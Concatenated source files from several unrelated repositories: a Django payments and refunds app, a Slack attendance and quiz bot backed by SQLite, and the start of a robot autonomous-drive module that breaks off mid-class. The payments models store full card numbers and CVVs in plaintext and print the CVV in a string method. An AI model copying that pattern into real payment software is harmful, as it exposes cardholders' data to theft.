| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,529 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/models.py | from django import forms
from django.db import models
from django.forms import ModelForm
import uuid
class Base(models.Model):
    """Core payment record shared by all payment methods."""

    # Payment-method and status constants (also used by the choice lists).
    CC = "credit_card"
    MBWay = "mbway"
    SUCCESS = "success"
    ERROR = "error"
    SETTLED = "settled"

    pay_method = (
        (CC, 'credit_card'),
        (MBWay, 'mbway')
    )
    statusOP = (
        (SUCCESS, 'success'),
        (ERROR, 'error'),
        (SETTLED, 'settled')
    )

    payment_id = models.UUIDField(max_length=200, primary_key=True, default=uuid.uuid4)  # primary key, auto generated UUID
    amount = models.FloatField()
    payment_method = models.CharField(max_length=50, default=CC, choices=pay_method)
    created_at = models.DateTimeField(auto_now_add=True)
    status = models.CharField(max_length=20, choices=statusOP)
    # Settlement details stay empty/zero until the payment is settled.
    settled_at = models.DateTimeField(null=True, blank=True)
    settled_amount = models.FloatField(null=True, blank=True, default=0)

    def __str__(self):
        # Human-readable summary; settlement info is appended only once set.
        baseStr = "Payment ID: " + str(self.payment_id) + ", Amount: " + str(self.amount) + "€, Method: " + self.payment_method + ", Created at: " + str(self.created_at) + ", Status: " + self.status
        if self.settled_at != None:
            return baseStr + ", Settled at: " + str(self.settled_at) + ", Settled amount: " + str(self.settled_amount) + "€"
        else:
            return baseStr
class CreditCard(models.Model):
    """Credit-card details for a payment (one-to-one with Base)."""

    payment_id = models.OneToOneField(Base, on_delete=models.CASCADE)  # Foreign key to Base
    number = models.CharField(max_length=16)
    name = models.CharField(max_length=30)
    expiration_month = models.CharField(max_length=2)
    expiration_year = models.CharField(max_length=4)
    cvv = models.CharField(max_length=3)

    def __str__(self):
        return str(self.payment_id) + ", Card Number: " + self.number + ", Name: " + self.name + ", Exp. Month: " + self.expiration_month + ", Exp. Year: " + self.expiration_year + ", CVV: " + self.cvv + "\n"
class MbWay(models.Model):
    """MBWay details for a payment (one-to-one with Base)."""

    payment_id = models.OneToOneField(Base, on_delete=models.CASCADE)  # Foreign key to base
    phone_number = models.CharField(max_length=9)

    def __str__(self):
        return str(self.payment_id) + ", Phone Number: " + self.phone_number + "\n"
class BaseForm(ModelForm):
    """ModelForm for Base with Bootstrap-styled widgets."""

    class Meta:
        model = Base
        fields = ('payment_id', 'amount', 'payment_method', 'status', 'settled_at', 'settled_amount')
        widgets = {
            # payment_id is generated server-side, so it is read-only.
            'payment_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
            'amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 0}),
            'payment_method': forms.Select(attrs={'class': 'form-control'}, choices=Base.pay_method),
            'settled_at': forms.DateTimeInput(attrs={'class': 'form-control', 'type': 'date'}),
            'settled_amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 0, 'default': 0}),
            # Status is set by the backend, never entered by the user.
            'status': forms.HiddenInput(attrs={'class': 'form-control', 'default': Base.ERROR}),
        }
class CreditCardForm(ModelForm):
    """ModelForm for CreditCard with Bootstrap-styled widgets."""

    class Meta:
        model = CreditCard
        fields = '__all__'
        widgets = {
            'payment_id': forms.TextInput(attrs={'readonly': 'readonly'}),
            'number': forms.NumberInput(attrs={'class': 'form-control', 'min': 1111111111111111, 'placeholder': 1111111111111111}),
            'name': forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'John Doe'}),
            'expiration_month': forms.NumberInput(attrs={'class': 'form-control', 'max': 12, 'min': 1}),
            'expiration_year': forms.NumberInput(attrs={'class': 'form-control', 'min': 2021}),
            'cvv': forms.NumberInput(attrs={'class': 'form-control', 'max': 999}),
        }
class MbWayForm(ModelForm):
    """ModelForm for MbWay with Bootstrap-styled widgets."""

    class Meta:
        model = MbWay
        fields = '__all__'
        widgets = {
            'payment_id': forms.TextInput(attrs={'readonly': 'readonly'}),
            'phone_number': forms.NumberInput(attrs={'class': 'form-control', 'maxlength': 9, 'placeholder': 910000000})
        }
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,530 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/admin.py | from django.contrib import admin
from .models import Refund
# Register your models here.
# Expose the Refund model in the Django admin interface.
admin.site.register(Refund)
53,531 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/admin.py | from django.contrib import admin
from .models import Base, CreditCard, MbWay
# Register your models here.
# Expose the payment models (base record plus both method-specific
# detail tables) in the Django admin interface.
admin.site.register(Base)
admin.site.register(CreditCard)
admin.site.register(MbWay)
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,532 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0002_auto_20210914_1405.py | # Generated by Django 2.2.12 on 2021-09-14 14:05
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: drops the method-specific payment models
    # (CreditCard / MbWay) and tightens the choice lists on Base.  Do not
    # edit applied migrations by hand.

    dependencies = [
        ('payments', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='mbway',
            name='payment_id',
        ),
        migrations.AlterField(
            model_name='base',
            name='payment_method',
            field=models.CharField(choices=[('credit_card', 'credit_card'), ('mbway', 'mbway')], max_length=50),
        ),
        migrations.AlterField(
            model_name='base',
            name='status',
            field=models.CharField(choices=[('success', 'success'), ('error', 'error'), ('settled', 'settled')], max_length=20),
        ),
        migrations.DeleteModel(
            name='CreditCard',
        ),
        migrations.DeleteModel(
            name='MbWay',
        ),
    ]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,533 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0004_auto_20210918_1404.py | # Generated by Django 2.2.12 on 2021-09-18 14:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: adds defaults/null-ability on Base's
    # settlement fields and re-links the method detail models to Base
    # via one-to-one cascade keys.  Do not edit applied migrations by hand.

    dependencies = [
        ('payments', '0003_creditcard_mbway'),
    ]

    operations = [
        migrations.AlterField(
            model_name='base',
            name='payment_method',
            field=models.CharField(choices=[('credit_card', 'credit_card'), ('mbway', 'mbway')], default='credit_card', max_length=50),
        ),
        migrations.AlterField(
            model_name='base',
            name='settled_amount',
            field=models.FloatField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='base',
            name='settled_at',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='creditcard',
            name='payment_id',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.Base'),
        ),
        migrations.AlterField(
            model_name='mbway',
            name='payment_id',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.Base'),
        ),
    ]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,534 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/models.py | from django import forms
from django.db import models
from django.forms.models import ModelForm
import uuid
class Refund(models.Model):
    """A (possibly partial) refund against a payment held by the payments service."""

    refund_id = models.UUIDField(max_length=200, primary_key=True, default=uuid.uuid4)
    # Plain CharField, not a FK: the payment lives in a separate service/DB.
    payment_id = models.CharField(max_length=200, default='v')
    created_at = models.DateTimeField(auto_now_add=True)
    amount = models.FloatField()

    def __str__(self):
        return "Refund ID:" + str(self.refund_id) + ", Payment ID: " + str(self.payment_id) + ", Created at: " + str(self.created_at) + ", Amount: " + str(self.amount) + "€\n"
class RefundForm(ModelForm):
    """ModelForm for Refund; id fields are read-only, amount is user input."""

    class Meta:
        model = Refund
        fields = '__all__'
        widgets = {
            'refund_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
            'payment_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
            'amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 1, 'placeholder': 0}),
        }
53,551 | greg-smith1/Big_Bot | refs/heads/master | /attendance.py | import os
import time
from pprint import pprint
from slackclient import SlackClient
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
starterbot_id = None
# constants
RTM_READ_DELAY = 3 # 1 second delay between reading from RTM
def attendance_protocol(hour, cohorts):
    """
    Posts an attendance prompt to every cohort channel, waits ten
    minutes for emoji responses, then appends the check-ins to a dated
    CSV file (attendance_YYYY_MM_DD.csv).

    hour: label written into the CSV "time" column (e.g. '10:00').
    cohorts: iterable of (cohort_name, channel_id) tuples.
    """
    sent_attendance = []
    date = time.strftime("%Y_%m_%d")
    # Post the check-in prompt to every cohort channel first...
    for cohort in cohorts:
        channel, msg_time = post_attendance(channel=cohort[1], cohort_name=cohort[0])
        sent_attendance.append((channel, msg_time, cohort[0]))
    # ...then give students ten minutes to react before collecting.
    time.sleep(600)
    with open('attendance_{}.csv'.format(date), 'a+') as a_report:
        a_report.write('name,time,cohort,date\n')
        for attendance in sent_attendance:
            response_json = take_attendance(channel=attendance[0], ts=attendance[1])
            print(len(response_json))
            attendance_report = []
            # Each element of response_json is one reaction (emoji) carrying
            # a "users" list of everyone who used that emoji.
            for _ in range(len(response_json)):
                (attendance_report.append(response_json[_]["users"]))
            print(attendance_report)
            try:
                # NOTE(review): user[0] records only the FIRST user of each
                # emoji reaction -- additional reactors who picked the same
                # emoji appear to be dropped.  Confirm whether that is intended.
                for user in attendance_report:
                    name = (slack_client.api_call(
                        "users.info",
                        user=user[0]
                    )['user']['real_name'])
                    print(name)
                    a_report.write('{},{},{},{}\n'.format(name, hour, attendance[2], date))
            except:
                # Bare except keeps one failed lookup from killing the run,
                # but it also hides real API errors.
                print('No check-ins recorded')
    print('\nCSV Written!!\n')
#acceptance = slide_staff_dms('U8BE9UNHF')
def post_attendance(channel, cohort_name):
    """
    Posts the attendance check-in message in the given channel.

    Returns (channel, message_timestamp) so the reactions can be
    collected later via reactions.get.
    """
    attendance_message = ("{}, please check in with an emoji response below! "
                          "(Only one response each, please)").format(cohort_name)
    response = slack_client.api_call(
        "chat.postMessage",
        channel=channel,
        text=attendance_message,
        icon_emoji=':byte:')
    # BUG FIX: the original had a trailing comma after ["ts"], making
    # msg_ts a 1-tuple; take_attendance() then formatted a stringified
    # tuple as the timestamp and could never match the message.
    msg_ts = response["ts"]
    return (channel, msg_ts)
def take_attendance(channel, ts):
    """
    Fetches the emoji reactions on the attendance message.

    Returns the list of reaction dicts, or [] when the message has no
    reactions (callers treat an empty list as "no check-ins").
    """
    try:
        attendance = slack_client.api_call(
            "reactions.get",
            channel="{}".format(channel),
            timestamp="{}".format(ts)
        )["message"]["reactions"]
        return attendance
    except (KeyError, TypeError):
        # "reactions" is absent when nobody reacted; TypeError covers an
        # error reply that lacks the expected nested-dict shape.  The
        # original bare except also swallowed unrelated errors.
        print('No check-ins recorded so far')
        return []
def get_channels():
    """
    Returns (name, id) tuples for every non-archived channel the bot
    is a member of.
    """
    channels = slack_client.api_call(
        "channels.list",
        exclude_archived='true',
        exclude_members='true'
    )["channels"]
    return [(c['name'], c['id']) for c in channels if c["is_member"]]
def slide_staff_dms(slack_id):
    """
    DM a staff member an interactive yes/no prompt asking them to sign
    off on attendance (*debugging/alpha version only*).
    """
    # The original also fetched the user's real_name via users.info and
    # never used it; that dead API round-trip has been removed.
    response = "Heyyy"
    slack_client.api_call(
        "chat.postMessage",
        channel=slack_id,
        text=response,
        attachments=[
            {
                "text": "Sign off below",
                "fallback": "You need to sign off for submission",
                "callback_id": "attendance_signoff",
                "color": "#3AA3E3",
                "attachment_type": "default",
                "actions": [
                    {
                        "name": "option",
                        "text": "Yes",
                        "type": "button",
                        "value": "yes"
                    },
                    {
                        "name": "option",
                        "text": "No",
                        "type": "button",
                        "value": "no"
                    }
                ]
            }
        ],
        username='ByteBot',
        icon_emoji=':byte:')
def get_usr_info(user_id):
    """Return the raw users.info API response for *user_id*."""
    return slack_client.api_call("users.info", user=user_id)
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,552 | greg-smith1/Big_Bot | refs/heads/master | /model.py | #!usr/bin/env python3
import sqlite3
import pandas as pd
def lookup_student(first_name, last_name=None):
    """Look up students by first (and optionally last) name.

    Returns an HTML table (str) of the matching rows, indexed by pk.
    """
    columns = ['pk', 'first_name', 'last_name', 'slack_id', 'email',
               'phone_num', 'github_id', 'cohort', 'week', 'length',
               'birthday', 'course_type', 'project_1', 'doc_1',
               'project_2', 'doc_2', 'absences']
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    try:
        cursor = connection.cursor()
        first_name = str(first_name).title()
        # Parameterized queries replace the original string-formatted SQL
        # (names arrive from chat input, so this was injectable); the
        # explicit None check replaces the try/except that relied on
        # None.title() raising AttributeError.
        if last_name is not None:
            cursor.execute(
                "SELECT * FROM students WHERE first_name = ? AND last_name = ?;",
                (first_name, str(last_name).title()))
        else:
            cursor.execute("SELECT * FROM students WHERE first_name = ?;",
                           (first_name,))
        rows = pd.DataFrame(cursor.fetchall(), columns=columns)
    finally:
        connection.close()
    rows.set_index('pk', inplace=True)
    print(rows)
    return rows.to_html()
def lookup_cohort(name):
    """Look up a cohort by (case-insensitive) name plus its students.

    Returns a (cohort_html, students_html) pair of HTML tables.
    Raises IndexError when no cohort matches (original behavior).
    """
    cohort_columns = ['pk', 'name', 'start', 'end', 'week',
                      'start_students', 'end_students', 'slack_channel']
    student_columns = ['pk', 'first_name', 'last_name', 'slack_id', 'email',
                       'phone_num', 'github_id', 'cohort', 'week', 'length',
                       'birthday', 'course_type', 'project_1', 'doc_1',
                       'project_2', 'doc_2', 'absences']
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    try:
        cursor = connection.cursor()
        # Parameterized queries replace the original string-formatted SQL
        # (cohort names arrive from chat input, so this was injectable).
        cursor.execute("SELECT * FROM cohorts WHERE name = ?;",
                       (str(name).lower(),))
        cohort = pd.DataFrame(cursor.fetchall(), columns=cohort_columns)
        cohort_id = cohort['pk'][0]
        cursor.execute("SELECT * FROM students WHERE cohort = ?;",
                       (int(cohort_id),))
        students = pd.DataFrame(cursor.fetchall(), columns=student_columns)
    finally:
        connection.close()
    cohort.set_index('pk', inplace=True)
    students.set_index('pk', inplace=True)
    print(cohort)
    print('\n')
    print(students)
    return cohort.to_html(), students.to_html()
def add_student(fn, ln, slack, email, phone, gh_id, cohort, week, length,
                birthday, course, proj1, doc1, proj2, doc2, absences):
    """Insert a student row; returns True on success, False on failure."""
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    cursor = connection.cursor()
    # Parameterized insert replaces the original string-formatted SQL
    # (injectable, and broken by any value containing a quote).
    sql_command = """INSERT INTO students(
        first_name,last_name,slack_id,email,phone,github_id,cohort,week,
        length,birth_date,course,project_1,doc_1,project_2,doc_2,absences
    ) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);"""
    params = (fn, ln, slack, email, phone, gh_id, cohort, week, length,
              birthday, course, proj1, doc1, proj2, doc2, absences)
    try:
        cursor.execute(sql_command, params)
        connection.commit()
        cursor.close()
        return True
    except sqlite3.Error:
        return False
    finally:
        # The original leaked the connection on every call.
        connection.close()
def add_cohort(name, start, end, week, start_students, end_students, slack_channel):
    """Insert a cohort row; returns True on success, False on failure."""
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    cursor = connection.cursor()
    # "end" is an SQL reserved word, so the identifier is quoted; values
    # are bound as parameters instead of being formatted into the SQL.
    sql_command = ('INSERT INTO cohorts'
                   '(name,start,"end",week,start_students,end_students,slack_channel) '
                   'VALUES(?,?,?,?,?,?,?);')
    try:
        cursor.execute(sql_command, (name, start, end, week,
                                     start_students, end_students, slack_channel))
        connection.commit()
        cursor.close()
        return True
    except sqlite3.Error:
        return False
    finally:
        connection.close()
def add_quiz(prompt, github_link):
    """Insert a quiz row; returns True on success, False on failure."""
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    cursor = connection.cursor()
    # Bind values as parameters instead of interpolating them into SQL
    # (the original broke on any prompt containing a single quote).
    sql_command = "INSERT INTO quizzes(prompt,github_link) VALUES(?,?);"
    try:
        cursor.execute(sql_command, (prompt, github_link))
        connection.commit()
        cursor.close()
        return True
    except sqlite3.Error:
        return False
    finally:
        connection.close()
def add_topics(topic_1, topic_2, topic_3, topic_4, topic_5, topic_6, topic_7, topic_8):
    """Insert one presentations row of 8 topics; True on success, else False."""
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    cursor = connection.cursor()
    # Bind values as parameters instead of interpolating them into SQL.
    sql_command = ("INSERT INTO presentations(topic_1, topic_2, topic_3, "
                   "topic_4, topic_5, topic_6, topic_7, topic_8) "
                   "VALUES(?,?,?,?,?,?,?,?);")
    topics = (topic_1, topic_2, topic_3, topic_4,
              topic_5, topic_6, topic_7, topic_8)
    try:
        cursor.execute(sql_command, topics)
        connection.commit()
        cursor.close()
        return True
    except sqlite3.Error:
        return False
    finally:
        connection.close()
def edit_db(table, column, value, id_):
    """Set one cell: UPDATE <table> SET <column> = value WHERE pk = id_.

    Returns True on success, False on failure.  Identifiers cannot be
    bound as SQL parameters, so *table* and *column* must come from
    trusted code, never from user input.
    """
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    cursor = connection.cursor()
    # BUG FIX: the original used named placeholders ({table}) with
    # positional .format() arguments, which raised KeyError before the
    # query could ever run.  value/id_ are now bound as parameters.
    sql_command = 'UPDATE {} SET {} = ? WHERE pk = ?;'.format(table, column)
    try:
        cursor.execute(sql_command, (value, id_))
        connection.commit()
        cursor.close()
        return True
    except sqlite3.Error:
        return False
    finally:
        connection.close()
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,553 | greg-smith1/Big_Bot | refs/heads/master | /Clementine.py | import os
import sys
import time
import schedule
import threading
import re
import random
from pprint import pprint
from slackclient import SlackClient
from attendance import *
from quizzes import *
from interactions import *
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
starterbot_id = None
# constants
VERSION = 'Clementine'
EXAMPLE_COMMAND = "do"
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
DELAY = 3 # 1 second delay between reading from RTM
def run_threaded(job_func):
    """Run *job_func* on a fresh daemon-less background thread (fire-and-forget)."""
    threading.Thread(target=job_func).start()
def job_1():
    """Morning (10:00) attendance pass over every cohort channel.

    Relies on the module-global my_channel_list assigned at startup
    in the __main__ block.
    """
    print('job1')
    attendance_protocol('10:00', cohorts=my_channel_list)
def job_2():
    """Afternoon attendance pass over every cohort channel.

    NOTE(review): the CSV time label is '1:00' while the schedule fires
    at 13:00 -- confirm whether '13:00' was intended.
    """
    attendance_protocol('1:00', cohorts=my_channel_list)
if __name__ == "__main__":
    if slack_client.rtm_connect():
        print("ByteBot connected and running!")
        # Read bot's user ID by calling Web API method `auth.test`
        starterbot_id = slack_client.api_call("auth.test")["user_id"]
        print(starterbot_id)
        # Module-global channel list consumed by job_1/job_2.
        my_channel_list = get_channels()
        print(my_channel_list)
        #pprint(get_usr_info('U1K2NBXUG'))
        #prompt = obtain_quiz(1)
        #dispatch_quiz(prompt, 'U1K2NBXUG')
        #dispatch_quiz(prompt, 'U8BE9UNHF')
        # Attendance passes run each weekday at 10:00 and 13:00.
        schedule.every().monday.at("10:00").do(run_threaded, job_1)
        schedule.every().tuesday.at("10:00").do(run_threaded, job_1)
        schedule.every().wednesday.at("10:00").do(run_threaded, job_1)
        schedule.every().thursday.at("10:00").do(run_threaded, job_1)
        schedule.every().friday.at("10:00").do(run_threaded, job_1)
        schedule.every().monday.at("13:00").do(run_threaded, job_2)
        schedule.every().tuesday.at("13:00").do(run_threaded, job_2)
        schedule.every().wednesday.at("13:00").do(run_threaded, job_2)
        schedule.every().thursday.at("13:00").do(run_threaded, job_2)
        schedule.every().friday.at("13:00").do(run_threaded, job_2)
        # Main RTM poll loop: dispatch @-mention commands and fire due jobs.
        while 1:
            command, channel = parse_bot_commands(slack_client.rtm_read(), starterbot_id)
            if command:
                print('command!!!!!')
                # NOTE(review): handle_command() is executed synchronously
                # here (it returns None), so run_threaded() then starts a
                # thread with target=None -- a no-op thread.  Likely
                # intended: run_threaded(lambda: handle_command(...)).
                run_threaded(handle_command(command, channel, starterbot_id))
            schedule.run_pending()
            #slide_staff_dms('U8BE9UNHF')
            #slide_staff_dms('U1K2NBXUG')
            time.sleep(DELAY)
    else:
        print("Connection failed. Exception traceback printed above.")
53,554 | greg-smith1/Big_Bot | refs/heads/master | /quizzes.py | import sqlite3
import os
from slackclient import SlackClient
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def get_slack_ids(week):
    """Fetch the quiz row(s) whose pk equals *week*.

    Returns the raw fetchall() result (list of tuples).
    NOTE(review): despite the name, the quizzes table holds
    prompt/github_link (see add_quiz), not Slack ids -- confirm intent.
    """
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    try:
        cursor = connection.cursor()
        # BUG FIX: the original statement was "SELECT FROM quizzes ..."
        # (no column list), an SQL syntax error that raised on every call;
        # the pk is now bound as a parameter rather than formatted in.
        cursor.execute("SELECT * FROM quizzes WHERE pk = ?;", (week,))
        ids = cursor.fetchall()
    finally:
        connection.close()
    print(ids)
    return ids
def obtain_quiz(week):
    """Return the quiz prompt for *week* (pk), or None when absent."""
    connection = sqlite3.connect('byte_master.db', check_same_thread=False)
    try:
        cursor = connection.cursor()
        # Parameter binding replaces the original string-formatted SQL.
        cursor.execute("SELECT * FROM quizzes WHERE pk = ?;", (week,))
        row = cursor.fetchone()
    finally:
        connection.close()
    # Guard against a missing week: the original did fetchone()[1] and
    # raised TypeError when no row matched.
    quiz = row[1] if row is not None else None
    print(quiz)
    return quiz
def dispatch_quiz(prompt, slack_id):
    """DM the quiz *prompt* to *slack_id*, posting as ByteBot."""
    payload = dict(
        channel=slack_id,
        text=prompt,
        username='ByteBot',
        icon_emoji=':python:',
    )
    slack_client.api_call("chat.postMessage", **payload)
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,555 | greg-smith1/Big_Bot | refs/heads/master | /interactions.py | import os
import time
import re
import schedule
import random
import sys
from slackclient import SlackClient
# instantiate Slack client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
# Bytebot's user ID in Slack: value is assigned after the bot starts up
#starterbot_id = None
# constants
VERSION = 'Clementine'
RTM_READ_DELAY = 3 # 1 second delay between reading from RTM
EXAMPLE_COMMAND = "do"
MENTION_REGEX = "^<@(|[WU].+?)>(.*)"
def parse_bot_commands(slack_events, starter_id):
    """
    Scan RTM events for a direct mention of the bot.

    Returns (command_text, channel) for the first plain message that
    @-mentions *starter_id*; otherwise (None, None).
    """
    for event in slack_events:
        print(event)
        # Skip everything that is not a plain user message.
        if event["type"] != "message" or "subtype" in event:
            continue
        mentioned_id, text = parse_direct_mention(event["text"])
        if mentioned_id == starter_id:
            return text, event["channel"]
    return None, None
def parse_direct_mention(message_text):
    """
    Extract a leading @-mention from *message_text*.

    Returns (user_id, remainder_stripped) when the message begins with a
    mention, otherwise (None, None).
    """
    match = re.search(MENTION_REGEX, message_text)
    if not match:
        return (None, None)
    # group 1 = the mentioned user id, group 2 = the rest of the message
    return (match.group(1), match.group(2).strip())
def handle_command(command, channel, starter_id):
    """
    Executes bot command if the command is known.

    command: message text that @-mentioned the bot (mention stripped).
    channel: channel id to reply in.
    starter_id: the bot's own Slack user id (shown by 'status').
    """
    print('Command found!!')
    post=True
    username = 'ByteBot'
    emoji = ':byte:'
    """
    reply_user = slack_client.api_call(
        "users.info",
        user=sending_user
    )['user']['real_name']
    """
    # Default response is help text for the user
    default_response = "Not sure what you mean. Try *{}* or *{}*.".format('hi', 'status')
    # Finds and executes the given command, filling in response
    response = None
    # This is where you start to implement more commands!
    if command.startswith(EXAMPLE_COMMAND):
        response = "Sure...write some more code then I can do that!"
    elif command.startswith('explain attendance'):
        # Two-part reply posted as "attendancebot": a teaser message now,
        # then the actual explanation via the shared post at the bottom.
        username = 'attendancebot'
        emoji = ':slack:'
        slack_client.api_call(
            "chat.postMessage",
            channel=channel,
            text='Ok! I\'ll be taking attendance tomorrow, let me explain \
how that\'ll work....',
            username=username,
            icon_emoji=emoji)
        time.sleep(2)
        response = 'Tomorrow around 10:00 I\'ll post a message in \
your channel. All you have to do is respond with an emoji (any emoji \
will do) and I\'ll collect the responses a little bit later. If you \
have any other questions, ask Greg!'
    elif command.startswith('hello') or command.startswith('hi'):
        response = 'Hi!!'
    elif command.startswith("how are you"):
        response_list = ['Fine.', 'Bored', 'Waiting for a real command', 'Jaded', ':face_vomiting:']
        response = random.choice(response_list)
    elif command.startswith("say hi"):
        response = "Hi. But shouldn't you get me logging attendance?"
    elif command.startswith("status"):
        # Report the running script's name, PID and the bot's Slack id.
        my_name = os.path.basename(sys.argv[0]).split('.')[0]
        process = os.getpid()
        username = str(my_name)
        emoji = ':slack:'
        response = "ByteBot Online.\nVersion: {}\nPID: {}\nSlack ID: {}".format(VERSION, process, starter_id)
    # Sends the response back to the channel
    elif command.startswith('analysis'):
        pass
    elif command.startswith('lookup Greg'):
        # Debug command: prints to the bot's terminal, not to Slack.
        print(slack_client.api_call(
            "users.info",
            user='U8BE9UNHF'
        )['user']['real_name'])
        response = 'Looked Greg up (check your terminal)'
    elif command.startswith('help'):
        # 'help' only DMs Greg; nothing is posted back to the channel.
        slide('U8BE9UNHF')
        post=False
    if post==True:
        slack_client.api_call(
            "chat.postMessage",
            channel=channel,
            text=response or default_response,
            username=username,
            icon_emoji=emoji
        )
def slide(user_id):
    """
    Sends Bytebot to DM a user.
    """
    # The original fetched the user's real_name via users.info and never
    # used it; the redundant API round-trip has been removed.
    response = "Heyy"
    slack_client.api_call(
        "chat.postMessage",
        channel=user_id,
        text=response,
        username='ByteBot',
        icon_emoji=':python:'
    )
| {"/Clementine.py": ["/attendance.py", "/quizzes.py", "/interactions.py"]} |
53,565 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/strategies.py | import math
import kiwidrive.parallel_generators as pg
class TurnStrategy:
    """Autonomous strategy: turn, drive forward, brake, turn back, park.

    Registers itself in robot.strategies under the key 'tote'.
    """

    def __init__(self, robot):
        self.robot = robot
        self.robot.strategies['tote'] = self

    def autonomousInit(self):
        """Build the chained generator pipeline run during autonomous."""
        self.auto = pg.ParallelGenerators()
        self.auto.add("back_left", self.turn_back_left())
        self.auto.add("forward1", self.forward1(), after="back_left")
        self.auto.add("brake1", self.brake1(), after="forward1")
        self.auto.add("forward_left", self.turn_forward_left(), after="brake1")
        self.auto.add("wait", self.wait(), after="forward_left")

    def auto_tote_periodic(self):
        for x in self.turn_back_left():
            yield

    def forward1(self):
        # Drive forward at half power for 140 control ticks.
        for i in range(140):
            self.robot.forward(0.5)
            yield

    def brake1(self):
        # Brief reverse burst to kill forward momentum.
        for i in range(15):
            self.robot.forward(-0.5)
            yield

    def wait(self):
        # Hold position for the remainder of autonomous.
        while True:
            self.robot.forward(0)
            yield

    def _turn_by(self, delta):
        """Generator: gyro-turn *delta* degrees relative to the current
        heading using a proportional controller on the right motor,
        finishing once the heading error stays under 3 degrees for more
        than 20 consecutive ticks.
        """
        angle0 = self.robot.gyro.getAngle()
        settle_count = 0
        while True:
            angle = self.robot.gyro.getAngle()
            anglediff = (angle0 + delta) - angle
            if abs(anglediff) < 3:
                settle_count += 1
            else:
                settle_count = 0
            if settle_count > 20:
                break
            # Proportional control, clamped to half power.
            val = -0.08 * anglediff
            if val > 0.5:
                val = 0.5
            if val < -0.5:
                val = -0.5
            self.robot.left_motor.set(0)
            self.robot.right_motor.set(val)
            yield

    def turn_back_left(self):
        # The two public turn routines were 20-line duplicates differing
        # only in the sign of the 90-degree setpoint; both now delegate
        # to _turn_by, preserving their generator interfaces.
        yield from self._turn_by(90)

    def turn_forward_left(self):
        yield from self._turn_by(-90)
class Auto3StraightStrategy:
    """Autonomous routine: pick up and carry three totes while driving
    straight, implemented as cooperating generators advanced one tick at
    a time by a ParallelGenerators scheduler."""

    def __init__(self, robot):
        self.robot = robot
        self.robot.strategies['3-tote-straight'] = self

    def autonomousInit(self):
        """Build the pipeline: pickup/drive/drop per tote, with claw and
        winch maintenance generators running in parallel throughout."""
        auto = pg.ParallelGenerators()
        self.robot.claw_down()
        # Power requested from the winch by whichever stage is active;
        # applied every tick by maintain_winch().
        self.winch_value = 0.0
        auto.add("claw", self.robot.maintain_claw())
        auto.add("winch", self.maintain_winch())
        auto.add("pickup1", self.auto_pickup_tote())
        auto.add("drive1", self.auto_drive_until_tote(), after="pickup1")
